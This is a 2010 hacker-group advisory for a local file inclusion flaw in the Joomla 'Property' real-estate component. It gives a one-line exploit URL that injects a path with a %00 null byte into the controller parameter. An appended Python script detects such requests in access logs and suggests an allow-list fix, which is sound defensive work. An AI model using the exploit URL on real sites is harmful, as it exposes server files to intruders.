---------------------------------------------------------------------------------
Joomla Component Property Local File Inclusion
---------------------------------------------------------------------------------

Author       : Chip D3 Bi0s
Group        : LatinHackTeam
Email & msn  : chipdebios[alt+64]gmail.com
Date         : 22 March 2010
Critical Lvl : Moderate
Impact       : Exposure of sensitive information
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Property
Developer   : este8an
License     : GPL
type        : Non Commercial
Date Added  : 22 January 2009
Download    : http://www.com-property.com/download.html?func=select&id=2

Description :

Property is a new Real Estate component 100% FREE native Joomla 1.5.
compatible with sh404sef and joomfish.

Add Profiles (Agent data: Client is a user joomla registered)
Can change permissions in User Manager to 'Agent' , then this user can
publish various properties.

Control Panel button Create Menus automatically creates menus in FrontEnd :
All Properties, My Short List(Favorites), My Panel(to publish properties),
My Profile. You can change names after created.
---------------------------------------------------------------------------

how to exploit

http://localhost/index.php?option=com_properties&controller=[LFI]%00

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
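
Added example (not part of the original advisory and not the component's own code): a Python check that flags access-log requests to com_properties whose controller parameter is not a plain identifier, such as one carrying the %00 null byte shown above. The log lines, the "properties" controller name and the identifier allow-list are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate controller name is a plain identifier.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]*")
# Request line as it appears in a combined-format access log.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation address range 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Mar/2010:10:00:01 +0000] "GET /index.php?option=com_properties&controller=properties HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Mar/2010:10:00:07 +0000] "GET /index.php?option=com_properties&controller=sample%00 HTTP/1.1" 200 311',
    '192.0.2.44 - - [22/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_properties&controller=sample%2500 HTTP/1.1" 200 311',
    '192.0.2.77 - - [22/Mar/2010:10:00:12 +0000] "GET /index.php?option=com_content&controller=a%00 HTTP/1.1" 200 900',
]

def suspicious_controller(url):
    """Return the decoded controller value when a com_properties request
    carries a controller that is not a plain identifier, else None."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if ("option", "com_properties") not in pairs:
        return None
    # Check every occurrence: the server may honour a repeated parameter.
    for key, value in pairs:
        if key == "controller" and not SAFE_CONTROLLER.fullmatch(value):
            # One decoding pass turns %00 into a NUL byte; a double-encoded
            # %2500 decodes to the literal "%00" and is rejected as well.
            return value
    return None

def scan(lines):
    """Return (client address, decoded controller value) for flagged requests."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_controller(match.group(1))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(client, repr(value))
```

The same allow-list test, applied to the controller value before it is used to build an include path, is the corresponding server-side mitigation.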